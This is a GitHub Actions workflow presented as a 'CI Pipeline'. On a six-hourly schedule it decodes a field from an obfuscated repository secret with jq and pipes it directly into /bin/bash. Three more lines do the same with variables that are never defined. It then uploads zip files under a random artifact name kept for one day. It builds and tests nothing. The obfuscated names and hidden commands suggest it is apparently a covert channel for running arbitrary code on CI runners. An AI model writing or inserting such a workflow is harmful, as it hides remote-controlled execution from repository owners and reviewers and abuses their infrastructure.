name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '49 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          eqv9: ${{ secrets.eqv9 }}
        run: |
          printf '%s' "$eqv9" | jq -r .pdmw937 | /bin/bash
          printf '%s' "$bv892" | jq -r .xkag878 | /bin/bash
          echo $k3 | jq -r .rc78 | /bin/bash
          printf '%s' "$jjvoa223" | jq -r .evbr8392 | /bin/bash

      - name: Archive results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: USeuGqOD
          path: "*.zip"
          retention-days: 1
